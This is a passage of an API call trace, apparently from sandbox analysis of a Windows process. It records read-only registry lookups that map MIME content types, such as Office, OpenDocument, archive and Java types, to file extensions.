hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-word.document.12", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.613] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.613] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".docx", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.613] CharLowerBuffW (in: lpsz=".docx", cchLength=0x5 | out: lpsz=".docx") returned 0x5 [0104.614] CharLowerBuffW (in: lpsz="application/vnd.ms-word.document.12", cchLength=0x23 | out: lpsz="application/vnd.ms-word.document.12") returned 0x23 [0104.614] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.614] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-word.document.macroEnabled.12", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.615] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.615] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".docm", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.615] CharLowerBuffW (in: lpsz=".docm", cchLength=0x5 | out: lpsz=".docm") returned 0x5 [0104.615] CharLowerBuffW (in: lpsz="application/vnd.ms-word.document.macroEnabled.12", cchLength=0x30 | out: lpsz="application/vnd.ms-word.document.macroenabled.12") returned 0x30 [0104.615] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.615] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-word.template.12", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.616] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.617] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".dotx", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.618] CharLowerBuffW (in: lpsz=".dotx", cchLength=0x5 | out: lpsz=".dotx") returned 0x5 [0104.618] CharLowerBuffW (in: lpsz="application/vnd.ms-word.template.12", cchLength=0x23 | out: lpsz="application/vnd.ms-word.template.12") returned 0x23 [0104.618] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.618] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-word.template.macroEnabled.12", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.619] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.619] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".dotm", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.620] CharLowerBuffW (in: lpsz=".dotm", cchLength=0x5 | out: lpsz=".dotm") returned 0x5 [0104.620] CharLowerBuffW (in: lpsz="application/vnd.ms-word.template.macroEnabled.12", cchLength=0x30 | out: lpsz="application/vnd.ms-word.template.macroenabled.12") returned 0x30 [0104.620] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.620] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-wpl", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.621] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.622] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".wpl", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.623] CharLowerBuffW (in: lpsz=".wpl", cchLength=0x4 | out: lpsz=".wpl") returned 0x4 [0104.623] CharLowerBuffW (in: lpsz="application/vnd.ms-wpl", cchLength=0x16 | out: lpsz="application/vnd.ms-wpl") returned 0x16 [0104.623] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.623] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-xpsdocument", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.623] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.623] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".xps", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.624] CharLowerBuffW (in: lpsz=".xps", cchLength=0x4 | out: lpsz=".xps") returned 0x4 [0104.624] CharLowerBuffW (in: lpsz="application/vnd.ms-xpsdocument", cchLength=0x1e | out: lpsz="application/vnd.ms-xpsdocument") returned 0x1e [0104.624] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.624] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.oasis.opendocument.presentation", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.625] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.625] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".odp", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.625] CharLowerBuffW (in: lpsz=".odp", cchLength=0x4 | out: lpsz=".odp") returned 0x4 [0104.625] CharLowerBuffW (in: lpsz="application/vnd.oasis.opendocument.presentation", cchLength=0x2f | out: lpsz="application/vnd.oasis.opendocument.presentation") returned 0x2f [0104.625] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.625] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.oasis.opendocument.spreadsheet", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.626] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.627] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".ods", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.627] CharLowerBuffW (in: lpsz=".ods", cchLength=0x4 | out: lpsz=".ods") returned 0x4 [0104.627] CharLowerBuffW (in: lpsz="application/vnd.oasis.opendocument.spreadsheet", cchLength=0x2e | out: lpsz="application/vnd.oasis.opendocument.spreadsheet") returned 0x2e [0104.627] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.627] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.oasis.opendocument.text", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.628] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.628] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".odt", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.628] CharLowerBuffW (in: lpsz=".odt", cchLength=0x4 | out: lpsz=".odt") returned 0x4 [0104.628] CharLowerBuffW (in: lpsz="application/vnd.oasis.opendocument.text", cchLength=0x27 | out: lpsz="application/vnd.oasis.opendocument.text") returned 0x27 [0104.628] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.628] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.openxmlformats-officedocument.presentationml.presentation", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.629] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.630] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".pptx", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.630] CharLowerBuffW (in: lpsz=".pptx", cchLength=0x5 | out: lpsz=".pptx") returned 0x5 [0104.630] CharLowerBuffW (in: lpsz="application/vnd.openxmlformats-officedocument.presentationml.presentation", cchLength=0x49 | out: lpsz="application/vnd.openxmlformats-officedocument.presentationml.presentation") returned 0x49 [0104.630] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.630] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.openxmlformats-officedocument.presentationml.slide", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.631] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.631] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".sldx", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.669] CharLowerBuffW (in: lpsz=".sldx", cchLength=0x5 | out: lpsz=".sldx") returned 0x5 [0104.669] CharLowerBuffW (in: lpsz="application/vnd.openxmlformats-officedocument.presentationml.slide", cchLength=0x42 | out: lpsz="application/vnd.openxmlformats-officedocument.presentationml.slide") returned 0x42 [0104.670] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.670] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.openxmlformats-officedocument.presentationml.slideshow", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.671] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.671] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".ppsx", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.671] CharLowerBuffW (in: lpsz=".ppsx", cchLength=0x5 | out: lpsz=".ppsx") returned 0x5 [0104.671] CharLowerBuffW (in: lpsz="application/vnd.openxmlformats-officedocument.presentationml.slideshow", cchLength=0x46 | out: lpsz="application/vnd.openxmlformats-officedocument.presentationml.slideshow") returned 0x46 [0104.672] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.672] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.openxmlformats-officedocument.presentationml.template", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.673] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.673] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".potx", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.674] CharLowerBuffW (in: lpsz=".potx", cchLength=0x5 | out: lpsz=".potx") returned 0x5 [0104.674] CharLowerBuffW (in: lpsz="application/vnd.openxmlformats-officedocument.presentationml.template", cchLength=0x45 | out: lpsz="application/vnd.openxmlformats-officedocument.presentationml.template") returned 0x45 [0104.674] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.674] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.openxmlformats-officedocument.spreadsheetml.sheet", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.675] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.675] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".xlsx", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.676] CharLowerBuffW (in: lpsz=".xlsx", cchLength=0x5 | out: lpsz=".xlsx") returned 0x5 [0104.676] CharLowerBuffW (in: lpsz="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet", cchLength=0x41 | out: lpsz="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet") returned 0x41 [0104.676] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.676] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.openxmlformats-officedocument.spreadsheetml.template", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.677] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.678] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".xltx", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.678] CharLowerBuffW (in: lpsz=".xltx", cchLength=0x5 | out: lpsz=".xltx") returned 0x5 [0104.678] CharLowerBuffW (in: lpsz="application/vnd.openxmlformats-officedocument.spreadsheetml.template", cchLength=0x44 | out: lpsz="application/vnd.openxmlformats-officedocument.spreadsheetml.template") returned 0x44 [0104.678] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.678] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.openxmlformats-officedocument.wordprocessingml.document", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.679] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.680] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".docx", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.680] CharLowerBuffW (in: lpsz=".docx", cchLength=0x5 | out: lpsz=".docx") returned 0x5 [0104.680] CharLowerBuffW (in: lpsz="application/vnd.openxmlformats-officedocument.wordprocessingml.document", cchLength=0x47 | out: lpsz="application/vnd.openxmlformats-officedocument.wordprocessingml.document") returned 0x47 [0104.680] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.680] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.openxmlformats-officedocument.wordprocessingml.template", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.680] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.681] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".dotx", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.681] CharLowerBuffW (in: lpsz=".dotx", cchLength=0x5 | out: lpsz=".dotx") returned 0x5 [0104.681] CharLowerBuffW (in: lpsz="application/vnd.openxmlformats-officedocument.wordprocessingml.template", cchLength=0x47 | out: lpsz="application/vnd.openxmlformats-officedocument.wordprocessingml.template") returned 0x47 [0104.681] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.681] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.visio", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.682] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.682] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".vsd", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.683] CharLowerBuffW (in: lpsz=".vsd", cchLength=0x4 | out: lpsz=".vsd") returned 0x4 [0104.683] CharLowerBuffW (in: lpsz="application/vnd.visio", cchLength=0x15 | out: lpsz="application/vnd.visio") returned 0x15 [0104.683] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.683] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.visio.webdrawing", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.684] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.685] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".vdw", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.685] CharLowerBuffW (in: lpsz=".vdw", cchLength=0x4 | out: lpsz=".vdw") returned 0x4 [0104.685] CharLowerBuffW (in: lpsz="application/vnd.visio.webdrawing", cchLength=0x20 | out: lpsz="application/vnd.visio.webdrawing") returned 0x20 [0104.686] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.686] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/windows-appcontent+xml", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.687] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x1e) returned 0x0 [0104.687] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x24a4c7c, lpcbData=0x19fc20*=0x1e | out: lpType=0x19fc10*=0x1, lpData=".appcontent-ms", lpcbData=0x19fc20*=0x1e) returned 0x0 [0104.687] CharLowerBuffW (in: lpsz=".appcontent-ms", cchLength=0xe | out: lpsz=".appcontent-ms") returned 0xe [0104.687] CharLowerBuffW (in: lpsz="application/windows-appcontent+xml", cchLength=0x22 | out: lpsz="application/windows-appcontent+xml") returned 0x22 [0104.687] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.687] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-complus", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.687] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0104.688] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.688] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-compress", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.689] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x6) returned 0x0 [0104.689] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2484044, lpcbData=0x19fc20*=0x6 | out: lpType=0x19fc10*=0x1, lpData=".z", lpcbData=0x19fc20*=0x6) returned 0x0 [0104.689] CharLowerBuffW (in: lpsz=".z", cchLength=0x2 | out: lpsz=".z") returned 0x2 [0104.689] CharLowerBuffW (in: lpsz="application/x-compress", cchLength=0x16 | out: lpsz="application/x-compress") returned 0x16 [0104.690] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.690] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-compressed", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.690] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x22) returned 0x0 [0104.690] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x24dbabc, lpcbData=0x19fc20*=0x22 | out: lpType=0x19fc10*=0x1, lpData=".solitairetheme8", lpcbData=0x19fc20*=0x22) returned 0x0 [0104.691] CharLowerBuffW (in: lpsz=".solitairetheme8", cchLength=0x10 | out: lpsz=".solitairetheme8") returned 0x10 [0104.691] CharLowerBuffW (in: lpsz="application/x-compressed", cchLength=0x18 | out: lpsz="application/x-compressed") returned 0x18 [0104.691] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.691] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-dtcp1", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.692] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x12) returned 0x0 [0104.692] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x249a6ac, lpcbData=0x19fc20*=0x12 | out: lpType=0x19fc10*=0x1, lpData=".dtcp-ip", lpcbData=0x19fc20*=0x12) returned 0x0 [0104.693] CharLowerBuffW (in: lpsz=".dtcp-ip", cchLength=0x8 | out: lpsz=".dtcp-ip") returned 0x8 [0104.693] CharLowerBuffW (in: lpsz="application/x-dtcp1", cchLength=0x13 | out: lpsz="application/x-dtcp1") returned 0x13 [0104.693] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.693] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-gzip", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.693] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x8) returned 0x0 [0104.695] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0x8 | out: lpType=0x19fc10*=0x1, lpData=".gz", lpcbData=0x19fc20*=0x8) returned 0x0 [0104.695] CharLowerBuffW (in: lpsz=".gz", cchLength=0x3 | out: lpsz=".gz") returned 0x3 [0104.695] CharLowerBuffW (in: lpsz="application/x-gzip", cchLength=0x12 | out: lpsz="application/x-gzip") returned 0x12 [0104.695] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.695] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-java-applet", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.695] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0104.696] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.696] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/x-java-jnlp-file", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.698] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.699] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".jnlp", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.700] CharLowerBuffW (in: 